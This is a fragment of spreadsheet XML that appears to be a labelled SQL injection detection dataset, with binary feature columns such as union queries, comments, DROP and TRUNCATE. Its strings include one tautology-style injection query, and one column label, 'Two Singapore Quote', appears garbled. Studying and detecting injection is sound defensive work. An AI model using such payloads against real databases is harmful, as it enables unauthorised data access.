    <t>SELECT * FROM product WHERE PCategory=' ' OR username IS NOT NULL OR username = ' '</t>
  </si>
  <si>
    <t>Union Query</t>
  </si>
  <si>
    <t>SingleLine Comment</t>
  </si>
  <si>
    <t>Semicolon</t>
  </si>
  <si>
    <t>Two Singapore Quote</t>
  </si>
  <si>
    <t>True Case Zero</t>
  </si>
  <si>
    <t>True Case One</t>
  </si>
  <si>
    <t>True Case CharX</t>
  </si>
  <si>
    <t>True Case VarA</t>
  </si>
  <si>
    <t>True Case charA</t>
  </si>
  <si>
    <t>Multiple Line Comment</t>
  </si>
  <si>
    <t>SET IDENTITY_INSERT</t>
  </si>
  <si>
    <t>TRUNCATE TABLE</t>
  </si>
  <si>
    <t>DROP table</t>
  </si>
  <si>
    <t>UPDATE</t>
  </si>
  <si>
    <t>INSERT into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</si>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</sst>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sz val="9"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2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03"/>
  <sheetViews>
    <sheetView tabSelected="1" zoomScaleNormal="100" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="G502" sqref="G502"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15"/>
  <cols>
    <col min="1" max="1" width="63.7109375" style="8" customWidth="1"/>
    <col min="2" max="2" width="6.7109375" style="1" customWidth="1"/>
    <col min="3" max="3" width="5.7109375" style="14" customWidth="1"/>
    <col min="4" max="5" width="6.7109375" style="3" customWidth="1"/>
    <col min="6" max="6" width="6.42578125" style="3" customWidth="1"/>
    <col min="7" max="7" width="5.42578125" style="3" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="5.7109375" style="3" customWidth="1"/>
    <col min="9" max="9" width="6.85546875" style="3" customWidth="1"/>
    <col min="10" max="12" width="5.7109375" style="3" customWidth="1"/>
    <col min="13" max="13" width="10.7109375" customWidth="1"/>
    <col min="14" max="14" width="8.7109375" style="15" customWidth="1"/>
    <col min="15" max="15" width="6.28515625" style="15" customWidth="1"/>
    <col min="16" max="16" width="6.42578125" style="14" customWidth="1"/>
    <col min="17" max="17" width="5.5703125" style="14" customWidth="1"/>
    <col min="18" max="18" width="8.28515625" style="14" customWidth="1"/>
    <col min="19" max="19" width="4.85546875" style="14" customWidth="1"/>
    <col min="20" max="20" width="6.28515625" style="18" customWidth="1"/>
    <col min="21" max="21" width="11.42578125" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:21" s="2" customFormat="1" ht="75">
      <c r="A1" s="6" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="4" t="s">
        <v>506</v>
      </c>
      <c r="C1" s="11" t="s">
        <v>507</v>
      </c>
      <c r="D1" s="5" t="s">
        <v>3</v>
      </c>
      <c r="E1" s="5" t="s">
        <v>2</v>
      </c>
      <c r="F1" s="5" t="s">
        <v>508</v>
      </c>
      <c r="G1" s="5" t="s">
        <v>509</v>
      </c>
      <c r="H1" s="5" t="s">
        <v>510</v>
      </c>
      <c r="I1" s="5" t="s">
        <v>511</v>
      </c>
      <c r="J1" s="5" t="s">
        <v>512</v>
      </c>
      <c r="K1" s="5" t="s">
        <v>513</v>
      </c>
      <c r="L1" s="5" t="s">
        <v>4</v>
      </c>
      <c r="M1" s="2" t="s">
        <v>514</v>
      </c>
      <c r="N1" s="11" t="s">
        <v>515</v>
      </c>
      <c r="O1" s="11" t="s">
        <v>516</v>
      </c>
      <c r="P1" s="11" t="s">
        <v>517</v>
      </c>
      <c r="Q1" s="11" t="s">
        <v>518</v>
      </c>
      <c r="R1" s="11" t="s">
        <v>519</v>
      </c>
      <c r="S1" s="11" t="s">
        <v>520</v>
      </c>
      <c r="T1" s="16" t="s">
        <v>1</v>
      </c>
      <c r="U1" s="2" t="s">
        <v>505</v>
      </c>
    </row>
    <row r="2" spans="1:21">
      <c r="A2" s="7" t="s">
        <v>5</v>
      </c>
      <c r="B2" s="1">
        <v>0</v>
      </c>
      <c r="C2" s="12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7">
        <v>0</v>
      </c>
      <c r="U2" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="3" spans="1:21" ht="36">
      <c r="A3" s="7" t="s">
        <v>6</v>
      </c>
      <c r="B3" s="1">
        <v>1</v>
      </c>
      <c r="C3" s="12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">
        <v>0</v>
      </c>
      <c r="N3" s="12">
        <v>0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7">
        <v>0</v>
      </c>
      <c r="U3" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="4" spans="1:21">
      <c r="A4" s="7" t="s">
        <v>7</v>
      </c>
      <c r="B4" s="1">
        <v>1</v>
      </c>
      <c r="C4" s="12">
        <v>1</v>
      </c>
      <c r="D4" s="9">
        <v>0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">
        <v>0</v>
      </c>
      <c r="N4" s="12">
        <v>0</v>
      </c>
      <c r="O4" s="12">
        <v>0</v>
      </c>
      <c r="P4" s="12">
        <v>1</v>
      </c>
      <c r="Q4" s="12">
        <v>0</v>
      </c>
      <c r="R4" s="12">
        <v>0</v>
      </c>
      <c r="S4" s="12">
        <v>0</v>
      </c>
      <c r="T4" s="17">
        <v>0</v>
      </c>
      <c r="U4" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="5" spans="1:21">
      <c r="A5" s="7" t="s">
        <v>8</v>
      </c>
      <c r="B5" s="1">
        <v>0</v>
      </c>
      <c r="C5" s="12">
        <v>0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7">
        <v>0</v>
      </c>
      <c r="U5" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="6" spans="1:21" ht="24">
      <c r="A6" s="7" t="s">
        <v>9</v>
      </c>
      <c r="B6" s="1">
        <v>0</v>
      </c>
      <c r="C6" s="12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7">
        <v>0</v>
      </c>
      <c r="U6" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="7" spans="1:21" ht="24">
      <c r="A7" s="7" t="s">
        <v>10</v>
      </c>
      <c r="B7" s="1">
        <v>1</v>
      </c>
      <c r="C7" s="12">
        <v>0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7">
        <v>0</v>
      </c>
      <c r="U7" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="8" spans="1:21" ht="48">
      <c r="A8" s="7" t="s">
        <v>11</v>
      </c>
      <c r="B8" s="1">
        <v>1</v>
      </c>
      <c r="C8" s="12">
        <v>1</v>
      </c>
      <c r="D8" s="9">
        <v>0</v>
      </c>
      <c r="E8" s="9">
        <v>1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1">
        <v>0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7">
        <v>0</v>
      </c>
      <c r="U8" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="9" spans="1:21">
      <c r="A9" s="7" t="s">
        <v>12</v>
      </c>
      <c r="B9" s="1">
        <v>1</v>
      </c>
      <c r="C9" s="12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7">
        <v>0</v>
      </c>
      <c r="U9" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="10" spans="1:21">
      <c r="A10" s="7" t="s">
        <v>13</v>
      </c>
      <c r="B10" s="1">
        <v>1</v>
      </c>
      <c r="C10" s="12">
        <v>0</v>
      </c>
      <c r="D10" s="9">
        <v>0</v>
      </c>
      <c r="E10" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U10" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="11" spans="1:21">
      <c r="A11" s="7" t="s">
        <v>14</v>
      </c>
      <c r="B11" s="1">
        <v>0</v>
      </c>
      <c r="C11" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U11" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="12" spans="1:21">
      <c r="A12" s="7" t="s">
        <v>15</v>
      </c>
      <c r="B12" s="1">
        <v>1</v>
      </c>
      <c r="C12" s="12">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U12" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="13" spans="1:21" ht="24">
      <c r="A13" s="7" t="s">
        <v>16</v>
      </c>
      <c r="B13" s="1">
        <v>1</v>
      </c>
      <c r="C13" s="12">
        <v>1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v>0</v>
      </c>
      <c r="N13" s="12">
        <v>0</v>
      </c>
      <c r="O13" s="12">
        <v>0</v>
      </c>
      <c r="P13" s="12">
        <v>0</v>
      </c>
      <c r="Q13" s="12">
        <v>1</v>
      </c>
      <c r="R13" s="12">
        <v>0</v>
      </c>
      <c r="S13" s="12">
        <v>0</v>
      </c>
      <c r="T13" s="17">
        <v>0</v>
      </c>
      <c r="U13" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:21">
      <c r="A14" s="7" t="s">
        <v>17</v>
      </c>
      <c r="B14" s="1">
        <v>1</v>
      </c>
      <c r="C14" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U14" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="15" spans="1:21" ht="24">
      <c r="A15" s="7" t="s">
        <v>18</v>
      </c>
      <c r="B15" s="1">
        <v>1</v>
      </c>
      <c r="C15" s="12">
        <v>1</v>
      </c>
      <c r="D15" s="9">
        <v>0</v>
      </c>
      <c r="E15" s="9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1">
        <v>0</v>
      </c>
      <c r="N15" s="12">
        <v>0</v>
      </c>
      <c r="O15" s="12">
        <v>0</v>
      </c>
      <c r="P15" s="12">
        <v>0</v>
      </c>
      <c r="Q15" s="12">
        <v>1</v>
      </c>
      <c r="R15" s="12">
        <v>0</v>
      </c>
      <c r="S15" s="12">
        <v>0</v>
      </c>
      <c r="T15" s="17">
        <v>0</v>
      </c>
      <c r="U15" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="16" spans="1:21">
      <c r="A16" s="7" t="s">
        <v>19</v>
      </c>
      <c r="B16" s="1">
        <v>1</v>
      </c>
      <c r="C16" s="12">
        <v>0</v>
      </c>
      <c r="D16" s="9">
        <v>0</v>
      </c>
      <c r="E16" s="9">
        <v>0</v>
      </c>
      <c r="F16" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U16" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:21" ht="24">
      <c r="A17" s="7" t="s">
        <v>20</v>
      </c>
      <c r="B17" s="1">
        <v>1</v>
      </c>
      <c r="C17" s="12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7">
        <v>1</v>
      </c>
      <c r="U17" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="18" spans="1:21" ht="24">
      <c r="A18" s="7" t="s">
        <v>21</v>
      </c>
      <c r="B18" s="1">
        <v>1</v>
      </c>
      <c r="C18" s="12">
        <v>1</v>
      </c>
      <c r="D18" s="9">
        <v>0</v>
      </c>
      <c r="E18" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U18" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="19" spans="1:21">
      <c r="A19" s="7" t="s">
        <v>22</v>
      </c>
      <c r="B19" s="1">
        <v>1</v>
      </c>
      <c r="C19" s="12">
        <v>0</v>
      </c>
      <c r="D19" s="9">
        <v>0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7">
        <v>0</v>
      </c>
      <c r="U19" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="20" spans="1:21" ht="24">
      <c r="A20" s="7" t="s">
        <v>23</v>
      </c>
      <c r="B20" s="1">
        <v>1</v>
      </c>
      <c r="C20" s="12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7">
        <v>1</v>
      </c>
      <c r="U20" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="21" spans="1:21">
      <c r="A21" s="7" t="s">
        <v>24</v>
      </c>
      <c r="B21" s="1">
        <v>1</v>
      </c>
      <c r="C21" s="12">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U21" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="22" spans="1:21" ht="24">
      <c r="A22" s="7" t="s">
        <v>25</v>
      </c>
      <c r="B22" s="1">
        <v>1</v>
      </c>
      <c r="C22" s="12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7">
        <v>1</v>
      </c>
      <c r="U22" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="23" spans="1:21" ht="24">
      <c r="A23" s="7" t="s">
        <v>26</v>
      </c>
      <c r="B23" s="1">
        <v>1</v>
      </c>
      <c r="C23" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U23" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="24" spans="1:21">
      <c r="A24" s="7" t="s">
        <v>27</v>
      </c>
      <c r="B24" s="1">
        <v>1</v>
      </c>
      <c r="C24" s="12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7">
        <v>0</v>
      </c>
      <c r="U24" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="25" spans="1:21">
      <c r="A25" s="7" t="s">
        <v>28</v>
      </c>
      <c r="B25" s="1">
        <v>1</v>
      </c>
      <c r="C25" s="12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7">
        <v>0</v>
      </c>
      <c r="U25" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="26" spans="1:21" ht="24">
      <c r="A26" s="7" t="s">
        <v>29</v>
      </c>
      <c r="B26" s="1">
        <v>1</v>
      </c>
      <c r="C26" s="12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7">
        <v>0</v>
      </c>
      <c r="U26" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="27" spans="1:21" ht="24">
      <c r="A27" s="7" t="s">
        <v>30</v>
      </c>
      <c r="B27" s="1">
        <v>0</v>
      </c>
      <c r="C27" s="12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7">
        <v>0</v>
      </c>
      <c r="U27" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="28" spans="1:21">
      <c r="A28" s="7" t="s">
        <v>31</v>
      </c>
      <c r="B28" s="1">
        <v>1</v>
      </c>
      <c r="C28" s="12">
        <v>0</v>
      </c>
      <c r="D28" s="9">
        <v>0</v>
      </c>
      <c r="E28" s="9">
        <v>0</v>
      </c>
      <c r="F28" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U28" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="29" spans="1:21">
      <c r="A29" s="7" t="s">
        <v>32</v>
      </c>
      <c r="B29" s="1">
        <v>1</v>
      </c>
      <c r="C29" s="12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7">
        <v>0</v>
      </c>
      <c r="U29" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="30" spans="1:21">
      <c r="A30" s="7" t="s">
        <v>33</v>
      </c>
      <c r="B30" s="1">
        <v>0</v>
      </c>
      <c r="C30" s="12">
        <v>0</v>
      </c>
      <c r="D30" s="9">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U30" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="31" spans="1:21">
      <c r="A31" s="7" t="s">
        <v>34</v>
      </c>
      <c r="B31" s="1">
        <v>0</v>
      </c>
      <c r="C31" s="12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0</v>
      </c>
      <c r="M31" s="1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7">
        <v>0</v>
      </c>
      <c r="U31" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="32" spans="1:21">
      <c r="A32" s="7" t="s">
        <v>35</v>
      </c>
      <c r="B32" s="1">
        <v>0</v>
      </c>
      <c r="C32" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U32" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="33" spans="1:21">
      <c r="A33" s="7" t="s">
        <v>36</v>
      </c>
      <c r="B33" s="1">
        <v>0</v>
      </c>
      <c r="C33" s="12">
        <v>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1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7">
        <v>0</v>
      </c>
      <c r="U33" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="34" spans="1:21" ht="24">
      <c r="A34" s="7" t="s">
        <v>37</v>
      </c>
      <c r="B34" s="1">
        <v>1</v>
      </c>
      <c r="C34" s="12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7">
        <v>1</v>
      </c>
      <c r="U34" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="35" spans="1:21">
      <c r="A35" s="7" t="s">
        <v>38</v>
      </c>
      <c r="B35" s="1">
        <v>0</v>
      </c>
      <c r="C35" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U35" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="36" spans="1:21" ht="24">
      <c r="A36" s="7" t="s">
        <v>39</v>
      </c>
      <c r="B36" s="1">
        <v>1</v>
      </c>
      <c r="C36" s="12">
        <v>0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7">
        <v>1</v>
      </c>
      <c r="U36" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="37" spans="1:21" ht="24">
      <c r="A37" s="7" t="s">
        <v>40</v>
      </c>
      <c r="B37" s="1">
        <v>1</v>
      </c>
      <c r="C37" s="12">
        <v>0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7">
        <v>1</v>
      </c>
      <c r="U37" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="38" spans="1:21" ht="24">
      <c r="A38" s="7" t="s">
        <v>41</v>
      </c>
      <c r="B38" s="1">
        <v>1</v>
      </c>
      <c r="C38" s="12">
        <v>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7">
        <v>1</v>
      </c>
      <c r="U38" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="39" spans="1:21" ht="36">
      <c r="A39" s="7" t="s">
        <v>42</v>
      </c>
      <c r="B39" s="1">
        <v>1</v>
      </c>
      <c r="C39" s="12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7">
        <v>0</v>
      </c>
      <c r="U39" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="40" spans="1:21" ht="24">
      <c r="A40" s="7" t="s">
        <v>43</v>
      </c>
      <c r="B40" s="1">
        <v>0</v>
      </c>
      <c r="C40" s="12">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U40" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="41" spans="1:21" ht="24">
      <c r="A41" s="7" t="s">
        <v>44</v>
      </c>
      <c r="B41" s="1">
        <v>1</v>
      </c>
      <c r="C41" s="12">
        <v>0</v>
      </c>
      <c r="D41" s="9">
        <v>0</v>
      </c>
      <c r="E41" s="9">
        <v>1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7">
        <v>1</v>
      </c>
      <c r="U41" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="42" spans="1:21">
      <c r="A42" s="7" t="s">
        <v>45</v>
      </c>
      <c r="B42" s="1">
        <v>0</v>
      </c>
      <c r="C42" s="12">
        <v>0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7">
        <v>0</v>
      </c>
      <c r="U42" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="43" spans="1:21" ht="24">
      <c r="A43" s="7" t="s">
        <v>46</v>
      </c>
      <c r="B43" s="1">
        <v>1</v>
      </c>
      <c r="C43" s="12">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U43" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="44" spans="1:21" ht="24">
      <c r="A44" s="7" t="s">
        <v>47</v>
      </c>
      <c r="B44" s="1">
        <v>1</v>
      </c>
      <c r="C44" s="12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7">
        <v>1</v>
      </c>
      <c r="U44" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="45" spans="1:21" ht="36">
      <c r="A45" s="7" t="s">
        <v>48</v>
      </c>
      <c r="B45" s="1">
        <v>0</v>
      </c>
      <c r="C45" s="12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7">
        <v>0</v>
      </c>
      <c r="U45" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="46" spans="1:21">
      <c r="A46" s="7" t="s">
        <v>49</v>
      </c>
      <c r="B46" s="1">
        <v>1</v>
      </c>
      <c r="C46" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U46" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="47" spans="1:21" ht="36">
      <c r="A47" s="7" t="s">
        <v>50</v>
      </c>
      <c r="B47" s="1">
        <v>1</v>
      </c>
      <c r="C47" s="12">
        <v>1</v>
      </c>
      <c r="D47" s="9">
        <v>0</v>
      </c>
      <c r="E47" s="9">
        <v>1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1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1</v>
      </c>
      <c r="T47" s="17">
        <v>0</v>
      </c>
      <c r="U47" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="48" spans="1:21">
      <c r="A48" s="7" t="s">
        <v>51</v>
      </c>
      <c r="B48" s="1">
        <v>1</v>
      </c>
      <c r="C48" s="12">
        <v>0</v>
      </c>
      <c r="D48" s="9">
        <v>0</v>
      </c>
      <c r="E48" s="9">
        <v>0</v>
      </c>
      <c r="F48" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U48" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="49" spans="1:21">
      <c r="A49" s="7" t="s">
        <v>52</v>
      </c>
      <c r="B49" s="1">
        <v>1</v>
      </c>
      <c r="C49" s="12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7">
        <v>0</v>
      </c>
      <c r="U49" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="50" spans="1:21">
      <c r="A50" s="7" t="s">
        <v>53</v>
      </c>
      <c r="B50" s="1">
        <v>0</v>
      </c>
      <c r="C50" s="12">
        <v>0</v>
      </c>
      <c r="D50" s="9">
        <v>0</v>
      </c>
      <c r="E50" s="9">
        <v>0</v>
      </c>
      <c r="F50" s="9">
        <v>1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0</v>
      </c>
      <c r="M50" s="1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7">
        <v>0</v>
      </c>
      <c r="U50" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="51" spans="1:21" ht="24">
      <c r="A51" s="7" t="s">
        <v>54</v>
      </c>
      <c r="B51" s="1">
        <v>1</v>
      </c>
      <c r="C51" s="12">
        <v>0</v>
      </c>
      <c r="D51" s="9">
        <v>0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7">
        <v>1</v>
      </c>
      <c r="U51" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="52" spans="1:21">
      <c r="A52" s="7" t="s">
        <v>55</v>
      </c>
      <c r="B52" s="1">
        <v>0</v>
      </c>
      <c r="C52" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U52" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="53" spans="1:21" ht="24">
      <c r="A53" s="7" t="s">
        <v>56</v>
      </c>
      <c r="B53" s="1">
        <v>0</v>
      </c>
      <c r="C53" s="12">
        <v>0</v>
      </c>
      <c r="D53" s="9">
        <v>0</v>
      </c>
      <c r="E53" s="9">
        <v>0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7">
        <v>0</v>
      </c>
      <c r="U53" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="54" spans="1:21" ht="36">
      <c r="A54" s="7" t="s">
        <v>57</v>
      </c>
      <c r="B54" s="1">
        <v>1</v>
      </c>
      <c r="C54" s="12">
        <v>0</v>
      </c>
      <c r="D54" s="9">
        <v>0</v>
      </c>
      <c r="E54" s="9">
        <v>0</v>
      </c>
      <c r="F54" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U54" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="55" spans="1:21" ht="72">
      <c r="A55" s="7" t="s">
        <v>58</v>
      </c>
      <c r="B55" s="1">
        <v>0</v>
      </c>
      <c r="C55" s="12">
        <v>0</v>
      </c>
      <c r="D55" s="9">
        <v>0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1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7">
        <v>0</v>
      </c>
      <c r="U55" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="56" spans="1:21" ht="24">
      <c r="A56" s="7" t="s">
        <v>59</v>
      </c>
      <c r="B56" s="1">
        <v>1</v>
      </c>
      <c r="C56" s="12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7">
        <v>1</v>
      </c>
      <c r="U56" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="57" spans="1:21" ht="24">
      <c r="A57" s="7" t="s">
        <v>60</v>
      </c>
      <c r="B57" s="1">
        <v>1</v>
      </c>
      <c r="C57" s="12">
        <v>0</v>
      </c>
      <c r="D57" s="9">
        <v>0</v>
      </c>
      <c r="E57" s="9">
        <v>1</v>
      </c>
      <c r="F57" s="9">
        <v>0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0</v>
      </c>
      <c r="M57" s="1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7">
        <v>0</v>
      </c>
      <c r="U57" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="58" spans="1:21" ht="24">
      <c r="A58" s="7" t="s">
        <v>61</v>
      </c>
      <c r="B58" s="1">
        <v>1</v>
      </c>
      <c r="C58" s="12">
        <v>1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7">
        <v>1</v>
      </c>
      <c r="U58" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="59" spans="1:21" ht="24">
      <c r="A59" s="7" t="s">
        <v>62</v>
      </c>
      <c r="B59" s="1">
        <v>1</v>
      </c>
      <c r="C59" s="12">
        <v>0</v>
      </c>
      <c r="D59" s="9">
        <v>0</v>
      </c>
      <c r="E59" s="9">
        <v>0</v>
      </c>
      <c r="F59" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U59" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="60" spans="1:21" ht="24">
      <c r="A60" s="7" t="s">
        <v>63</v>
      </c>
      <c r="B60" s="1">
        <v>1</v>
      </c>
      <c r="C60" s="12">
        <v>0</v>
      </c>
      <c r="D60" s="9">
        <v>0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7">
        <v>0</v>
      </c>
      <c r="U60" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="61" spans="1:21" ht="24">
      <c r="A61" s="7" t="s">
        <v>64</v>
      </c>
      <c r="B61" s="1">
        <v>1</v>
      </c>
      <c r="C61" s="12">
        <v>1</v>
      </c>
      <c r="D61" s="9">
        <v>0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">
        <v>0</v>
      </c>
      <c r="N61" s="12">
        <v>0</v>
      </c>
      <c r="O61" s="12">
        <v>0</v>
      </c>
      <c r="P61" s="12">
        <v>0</v>
      </c>
      <c r="Q61" s="12">
        <v>0</v>
      </c>
      <c r="R61" s="12">
        <v>1</v>
      </c>
      <c r="S61" s="12">
        <v>0</v>
      </c>
      <c r="T61" s="17">
        <v>0</v>
      </c>
      <c r="U61" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="62" spans="1:21">
      <c r="A62" s="7" t="s">
        <v>65</v>
      </c>
      <c r="B62" s="1">
        <v>1</v>
      </c>
      <c r="C62" s="12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7">
        <v>0</v>
      </c>
      <c r="U62" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="63" spans="1:21">
      <c r="A63" s="7" t="s">
        <v>66</v>
      </c>
      <c r="B63" s="1">
        <v>0</v>
      </c>
      <c r="C63" s="12">
        <v>0</v>
      </c>
      <c r="D63" s="9">
        <v>0</v>
      </c>
      <c r="E63" s="9">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U63" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="64" spans="1:21" ht="24">
      <c r="A64" s="7" t="s">
        <v>67</v>
      </c>
      <c r="B64" s="1">
        <v>1</v>
      </c>
      <c r="C64" s="12">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U64" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="65" spans="1:21" ht="60">
      <c r="A65" s="7" t="s">
        <v>68</v>
      </c>
      <c r="B65" s="1">
        <v>0</v>
      </c>
      <c r="C65" s="12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1</v>
      </c>
      <c r="M65" s="1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U65" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="66" spans="1:21">
      <c r="A66" s="7" t="s">
        <v>69</v>
      </c>
      <c r="B66" s="1">
        <v>1</v>
      </c>
      <c r="C66" s="12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7">
        <v>0</v>
      </c>
      <c r="U66" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="67" spans="1:21">
      <c r="A67" s="7" t="s">
        <v>70</v>
      </c>
      <c r="B67" s="1">
        <v>0</v>
      </c>
      <c r="C67" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U67" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="68" spans="1:21">
      <c r="A68" s="7" t="s">
        <v>71</v>
      </c>
      <c r="B68" s="1">
        <v>0</v>
      </c>
      <c r="C68" s="12">
        <v>0</v>
      </c>
      <c r="D68" s="9">
        <v>0</v>
      </c>
      <c r="E68" s="9">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U68" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="69" spans="1:21" ht="24">
      <c r="A69" s="7" t="s">
        <v>72</v>
      </c>
      <c r="B69" s="1">
        <v>1</v>
      </c>
      <c r="C69" s="12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7">
        <v>1</v>
      </c>
      <c r="U69" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="70" spans="1:21" ht="24">
      <c r="A70" s="7" t="s">
        <v>73</v>
      </c>
      <c r="B70" s="1">
        <v>1</v>
      </c>
      <c r="C70" s="12">
        <v>1</v>
      </c>
      <c r="D70" s="9">
        <v>0</v>
      </c>
      <c r="E70" s="9">
        <v>1</v>
      </c>
      <c r="F70" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U70" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="71" spans="1:21">
      <c r="A71" s="7" t="s">
        <v>74</v>
      </c>
      <c r="B71" s="1">
        <v>1</v>
      </c>
      <c r="C71" s="12">
        <v>1</v>
      </c>
      <c r="D71" s="9">
        <v>0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1</v>
      </c>
      <c r="K71" s="9">
        <v>0</v>
      </c>
      <c r="L71" s="9">
        <v>0</v>
      </c>
      <c r="M71" s="1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7">
        <v>0</v>
      </c>
      <c r="U71" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="72" spans="1:21">
      <c r="A72" s="7" t="s">
        <v>75</v>
      </c>
      <c r="B72" s="1">
        <v>1</v>
      </c>
      <c r="C72" s="12">
        <v>0</v>
      </c>
      <c r="D72" s="9">
        <v>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1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7">
        <v>0</v>
      </c>
      <c r="U72" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="73" spans="1:21">
      <c r="A73" s="7" t="s">
        <v>76</v>
      </c>
      <c r="B73" s="1">
        <v>0</v>
      </c>
      <c r="C73" s="12">
        <v>0</v>
      </c>
      <c r="D73" s="9">
        <v>0</v>
      </c>
      <c r="E73" s="9">
        <v>0</v>
      </c>
      <c r="F73" s="9">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U73" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="74" spans="1:21" ht="24">
      <c r="A74" s="7" t="s">
        <v>77</v>
      </c>
      <c r="B74" s="1">
        <v>1</v>
      </c>
      <c r="C74" s="12">
        <v>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7">
        <v>1</v>
      </c>
      <c r="U74" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="75" spans="1:21" ht="48">
      <c r="A75" s="7" t="s">
        <v>78</v>
      </c>
      <c r="B75" s="1">
        <v>1</v>
      </c>
      <c r="C75" s="12">
        <v>1</v>
      </c>
      <c r="D75" s="9">
        <v>0</v>
      </c>
      <c r="E75" s="9">
        <v>1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1">
        <v>0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7">
        <v>0</v>
      </c>
      <c r="U75" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="76" spans="1:21" ht="24">
      <c r="A76" s="7" t="s">
        <v>79</v>
      </c>
      <c r="B76" s="1">
        <v>1</v>
      </c>
      <c r="C76" s="12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1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7">
        <v>1</v>
